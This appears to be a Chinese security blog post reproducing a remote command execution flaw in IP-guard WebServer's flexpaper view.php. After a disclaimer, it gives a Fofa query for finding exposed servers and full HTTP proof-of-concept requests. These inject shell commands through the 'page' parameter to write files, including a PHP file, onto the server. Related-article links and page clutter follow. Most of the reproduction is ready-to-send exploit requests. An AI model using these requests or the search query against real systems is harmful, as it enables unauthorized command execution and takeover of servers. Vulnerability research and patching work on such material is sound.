IP-guard WebServer 远程命令执行漏洞

原创 已于 2023-11-10 11:10:24 修改 · 1.6k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#tcp/ip #网络协议 #网络 #安全 #web安全 #网络安全 #php

于 2023-11-09 21:12:30 首次发布
本文描述了IP-guardWebServer的一个远程命令执行漏洞,攻击者可利用此漏洞在未授权情况下执行操作系统命令。文章提供了漏洞复现步骤,包括构造Poc和执行命令的过程,强调了安全风险和合法测试的界限。

IP-guard WebServer 远程命令执行漏洞

免责声明

仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。
任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。
该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。
作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。

漏洞描述

IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。

漏洞影响

IP-guard < 4.81.0307.0

漏洞危害

未经允许的攻击者可通过该漏洞执行操作系统命令,接管服务器。

网络测绘

Fofa: app=“ip-guard”

在这里插入图片描述
在这里插入图片描述

漏洞复现

1. 构造poc

GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=1.jpg&format=swf&isSplit=true&page=||echo+123+>+test.txt HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ipg_session=0vj0240xxxxxxxxn0ug6; PHPSESSID=dqmb1suxxxxxxxxxxa9fmk7tii
Upgrade-Insecure-Requests: 1

在这里插入图片描述

2. 访问文件

GET /ipg/static/appr/lib/flexpaper/php/test.txt HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ipg_session=0vj0240nkri5qp27v40f6bj4getn0ug6; PHPSESSID=dqmb1suk7ci3te6rga9fmk7tii
Upgrade-Insecure-Requests: 1

在这里插入图片描述

3. 执行命令

GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=1.jpg&format=swf&isSplit=true&page=%7C%7Cecho+^%3C?php+phpinfo();+?^%3E+%3Etest.php HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ipg_session=0vj0240nkrxxxxxxxetn0ug6; PHPSESSID=dqmb1suk7xxxxxxxxxxxxtii
Upgrade-Insecure-Requests: 1

在这里插入图片描述
在这里插入图片描述

IP-guard Webserver view 远程命令执行漏洞【2023最新漏洞
holyxp的博客
11-12 3054
IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。
IP-Guard Webserver 远程命令执行漏洞(含批量验证poc)
weixin_43567873的博客
04-04 209
IP-Guard Webserver 远程命令执行漏洞(含批量验证poc)
自学黑客(网络安全),一般人我劝你还是算了吧
顶峰
09-22 414
网络安全自学路线
IP-guard WebServer 远程命令执行漏洞复现(0day)】
一纸荒芜的博客
11-10 5202
IP-guard Webserver远程命令执行漏洞(RCE)漏洞复现
漏洞复现】IP-guard WebServer 远程命令执行
失心少年
11-17 994
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!IP-guard是一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。攻击者可利用该漏洞执行任意命令,获取服务器控制权限。1.利用如下POC进行Dnslog测试。
IP-guard Web系统远程命令执行漏洞说明
IP-Guard专栏
11-21 1348
漏洞修补程序,可用于使用任意IP-guard版本环境的Web系统执行修复,修补程序会根据当前系统中安装的web系统执行相应的修复处理;近期收到反馈,IP-guard Web服务器存在远程命令执行漏洞(RCE),经过分析,确认是因为Web系统的申请审批功能使用了开源插件 flexpaper 实现文件在线预览功能,此插件存在远程代码执行漏洞。使用完整更新包会同时更新所有Web系统使用的组件,为减少更新Web系统带来的兼容性影响,需要根据当前使用的IP-guard版本采取不同的更新方式。使用漏洞修补程序处理。
Goby 漏洞发布|IP-guard WebServer view.php 远程命令执行漏洞
m0_46699477的博客
11-10 368
IP-guard 是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。IP-Guard 版本小于4.81.0307.0 存在漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
关于IP-guard WebServer 远程命令执行漏洞的学习和自动化验证
wecanning的博客
11-10 1075
关于IP-guard WebServer 远程命令执行漏洞的学习和自动化验证
IP-guard 远程命令执行漏洞
m0_62172162的博客
12-19 752
IP-guard 远程命令执行漏洞
小巧的web服务器 PyWebServer v1.0 (只有一个exe文件)
05-02
版本V1.0 非常小巧的一个单exe文件web服务器,大小约为6MB,端口号为8081,直接把当前目录指定为web根目录,支持目录浏览,自定义端口/IP/根目录,文件访问。 适合测试,查看html帮助文档。附上了python源代码,方便修改并用‘pyinstaller -F -c pyWebServer.py’打包成单个exe文件。 参考我的博客:https://blog.youkuaiyun.com/hansel/article/details/89762715
IP-Guard安装部署WEB审批服务器
IP-Guard专栏
04-26 915
IP-guard支持基于B/S的管理方式,通过部署WEB服务器,可以实现在任何机器上使用浏览器登录服务器,实现控制台相关管理操作,如查看日志、报表、进行各项审批等。 部署WEB服务器的计算机不需要安装数据库。 安装的具体操作步骤如下: 双击IPguardWebServer.exe,选择安装界面语言,点击【确定】; 系统会弹出欢迎安装的界面,点击【下一步】继续; 安装程序会提示用户确定安装...
ip-guard web服务器安装
野生钢铁侠
07-11 754
ip-guard web服务器,自备软件包 管理员运行安装程序,默认下一步到这里,设置服务器信息 默认安装所有组件 设置安装目录 完成安装,打开方式:web服务器ip:端口
IP-Guard WEB控制台
IP-Guard专栏
12-06 2064
登录WEB控制台 在浏览器地址栏输入服务器地址,进入登录页面。 服务器地址填写的例子: 1、IP+默认端口80:192.168.2.203 2、IP+非默认端口8080:192.168.2.203:8080 3、域名+映射端口:tec.oicp.net:10941 4、前面加http: http://192.168.2.203 点击数据显示区首行中的按钮,默认隐藏的...
IP-GUARD安装和部署WEB服务器
IP-Guard专栏
10-09 1552
安装和部署WEB服务器 IP-guard支持基于B/S的管理方式,通过部署WEB服务器,可以实现在任何机器上使用浏览器登录服务器,实现控制台相关管理操作,如查看日志、报表、进行各项审批等。 部署WEB服务器的计算机不需要安装数据库。 安装的具体操作步骤如下: 双击IPguardWebServer.exe,选择安装界面语言,点击【确定】; 系统会弹出欢迎安装的界面,点击【下一步】继续...
ip-guard Web邮件截包操作步骤:
IP-Guard专栏
04-09 404
Web邮件截包操作步骤: (以下操作请先断开客户端与服务器的连接,简单的方法就是将IP-guard服务停止) 在客户端安装WinPcap; 运行disable.reg; 登录网页邮箱; 运行Analyzer,选择capture---start capture,并输入相关信息(如下图),如果使用的上网端口是其它的,如8080,就改为port 8080,网卡信息可以在客户端的本地连接的属性中...
应用攻略:跨平台管理再升级,IP-guardWeb平台隆重登场!
IP-Guard专栏
01-31 384
过去一年,IP-guard对自身产品进行了诸多创新和完善,加密不仅全面支持Windows、Mac OS及Linux系统,还推出了移动版的IP-guard加密客户端、查看器/审批APP、USBkey等等,其他管控模块也增加了更多新功能,这些功能的推出让用户可以实现更全面、高效的信息保护。 功能的推陈出新,管理平台也进行了大改进,现在IP-guard全新推出 Web管理平台,管理员可以在任何平台中的...
IP-guard WebServer RCE漏洞复现
0xSec
11-09 3208
IP-guard WebServer存在远程命令执行漏洞情报。攻击者可利用该漏洞执行任意命令,获取服务器控制权限。
IP-guard WebServer 2024年两个漏洞简单分析
最新发布
A345545108的博客
05-01 2801
这个漏洞看完索然无味,但是手上又刚好有源码,不看他一下又觉得可惜。
IP-GUARD控制台与WEB平台使用指南
WEB控制台需先安装webserver服务器,然后在浏览器输入服务器地址登录,如IP+默认端口80、IP+非默认端口、域名+映射端口等。WEB审批和报表功能分别支持桌面和加密申请的审批,以及周期和查询报表的查看。 3. 账户...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值